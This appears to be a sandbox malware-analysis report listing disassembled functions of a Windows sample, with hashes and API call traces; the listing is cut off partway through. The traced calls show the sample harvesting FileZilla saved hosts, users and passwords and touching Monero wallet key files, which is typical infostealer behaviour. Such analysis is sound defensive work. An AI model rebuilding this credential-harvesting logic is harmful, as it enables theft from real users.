                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: d0779e88c4e946c1b7e1745ee1b24def07d27f1c5dc9242780f92ffab4e60f82
                              • Instruction ID: 7c60932cdb9ed4b922d3e5f683fcb2d24d102339dfc73afe706ec57dfd8ded99
                              • Opcode Fuzzy Hash: d0779e88c4e946c1b7e1745ee1b24def07d27f1c5dc9242780f92ffab4e60f82
                              • Instruction Fuzzy Hash: 9A11CCB4A00209DFDB04DF98D985AAE77B5FF89300F104558E9159B350D774AE51CF61
                              Function 00C6F160 Relevance: 4.1, Strings: 2, Instructions: 1602COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &y}V$tw
                              • API String ID: 0-1981112408
                              • Opcode ID: 5350ca5660ecdcb56306dd9d1ab4ce9a7e88450bc774a4c3e2afab90a695d587
                              • Instruction ID: 27669d4790b8dac2b7cc8bf07a29f46823ef76c6b9dfe7c54bccec3aca2b8b64
                              • Opcode Fuzzy Hash: 5350ca5660ecdcb56306dd9d1ab4ce9a7e88450bc774a4c3e2afab90a695d587
                              • Instruction Fuzzy Hash: B4B216F390C204AFE3046E29EC8567ABBE9EF94720F16493DEAC4C7744EA3558058697
                              Function 008AF68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008C15B8,008C0D96), ref: 008AF71E
                              • StrCmpCA.SHLWAPI(?,008C15BC), ref: 008AF76F
                              • StrCmpCA.SHLWAPI(?,008C15C0), ref: 008AF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008AFAB1
                              • FindClose.KERNEL32(000000FF), ref: 008AFAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 28b5a2080ad78593f5e7a6d3cbf49bd9f3537d7b03bedc4ff6d953027ff404e3
                              • Instruction ID: b3d55f8d5df4c2d8fc4b7319aaa291f81f3a112c53dc03990c7249858aa8c712
                              • Opcode Fuzzy Hash: 28b5a2080ad78593f5e7a6d3cbf49bd9f3537d7b03bedc4ff6d953027ff404e3
                              • Instruction Fuzzy Hash: 5A11753180015DABDB28EBA4DCA59ED7378FF11300F4042A9A51AD6692EF302B4ACB53
                              Function 00BF11D3 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: -'
                              • API String ID: 0-3264590126
                              • Opcode ID: 2c398867269c7c3608090a967fced33845cc0df50a69f30e89dbeb0662eabfa9
                              • Instruction ID: e7f90f7d4451212fdf0135dc53c95aa7ec2c72510935802353c8181c9db9647e
                              • Opcode Fuzzy Hash: 2c398867269c7c3608090a967fced33845cc0df50a69f30e89dbeb0662eabfa9
                              • Instruction Fuzzy Hash: BE5137F7E086204BE3046A7CDD9936ABA95DB84360F2B473D9FA4A37C4E879490542C6
                              Function 00D07E51 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Jz*
                              • API String ID: 0-1480151498
                              • Opcode ID: 47d6035f38114b09d245796e636111a533071a9b0f936282b026b169a7f73d4d
                              • Instruction ID: 85ac4171c6d6a2b05428331655c19f1ab5c078b7e459d4a869a81463bde9b1e8
                              • Opcode Fuzzy Hash: 47d6035f38114b09d245796e636111a533071a9b0f936282b026b169a7f73d4d
                              • Instruction Fuzzy Hash: 3931D6F290D212DBD3046E68E88173ABBE4EF04310F16096DEAC98B340E575A95087D7
                              Function 00D311CF Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 7}2
                              • API String ID: 0-325700841
                              • Opcode ID: 4ab09fb644115971205ba9a52d17570a4f00ac6068e28078895580fd49129db2
                              • Instruction ID: 906ad8622894a9dd60d8510a291a10f6d4cf4c5aa539716b7cd42d141597a1a0
                              • Opcode Fuzzy Hash: 4ab09fb644115971205ba9a52d17570a4f00ac6068e28078895580fd49129db2
                              • Instruction Fuzzy Hash: D2219CB251C304AFE316AF59DC8566AF7E4FF98710F16482DE6C483600E6319851CA97
                              Function 00CF5CAF Relevance: .2, Instructions: 186COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 731578e2a6382e421e2a33123aa75e9b01139705ccb2a36bad8a977335fe3de5
                              • Instruction ID: 7816d55a978f005a592bc5a323f3d0ef57592e67a0c4f3d5efadb5f7134cd069
                              • Opcode Fuzzy Hash: 731578e2a6382e421e2a33123aa75e9b01139705ccb2a36bad8a977335fe3de5
                              • Instruction Fuzzy Hash: 3451E4B260C6009FE304AF2ED94563AFBE9EFD4720F16492EE6C5C3340E6359845CA97
                              Function 00B48297 Relevance: .2, Instructions: 165COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7479435cc39330fe52bfa30d2c147eb58a85954f312c55e21e30a0b3036a1446
                              • Instruction ID: 8466122834e4f1c98c4c3581487fd184088e9ef6988bc3390a09629b44f6e33a
                              • Opcode Fuzzy Hash: 7479435cc39330fe52bfa30d2c147eb58a85954f312c55e21e30a0b3036a1446
                              • Instruction Fuzzy Hash: 7141F9F3A082005FF714AE1EEC85B3BB7EAEBD4310F16853DDA8987344E93958058696
                              Function 00C58B20 Relevance: .1, Instructions: 132COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8665575f1cacb09aac3f8976913dbdf8979332d0ca8b23bdf33a5443104bfec
                              • Instruction ID: c1b96f9a28387710c603c0f4f48de0f769923da85df60dfa378115642e3c72e4
                              • Opcode Fuzzy Hash: d8665575f1cacb09aac3f8976913dbdf8979332d0ca8b23bdf33a5443104bfec
                              • Instruction Fuzzy Hash: 863137F3A182046BF3046929ED457BB77CADBD4330F2E823DEA84D3780F93999054291
                              Function 008B9750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 008B0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
                                • Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
                                • Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
                                • Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
                                • Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
                                • Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A
                                • Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,008C0DBA,008C0DB7,008C0DB6,008C0DB3), ref: 008B0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 008B0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 008B03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 008B0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008B0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 008B0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 008B0571
                              • lstrcat.KERNEL32(?,url: ), ref: 008B0580
                              • lstrcat.KERNEL32(?,00000000), ref: 008B0593
                              • lstrcat.KERNEL32(?,008C1678), ref: 008B05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 008B05B5
                              • lstrcat.KERNEL32(?,008C167C), ref: 008B05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 008B05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 008B05E6
                              • lstrcat.KERNEL32(?,008C1688), ref: 008B05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 008B0604
                              • lstrcat.KERNEL32(?,00000000), ref: 008B0617
                              • lstrcat.KERNEL32(?,008C1698), ref: 008B0626
                              • lstrcat.KERNEL32(?,008C169C), ref: 008B0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008C0DB2), ref: 008B068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
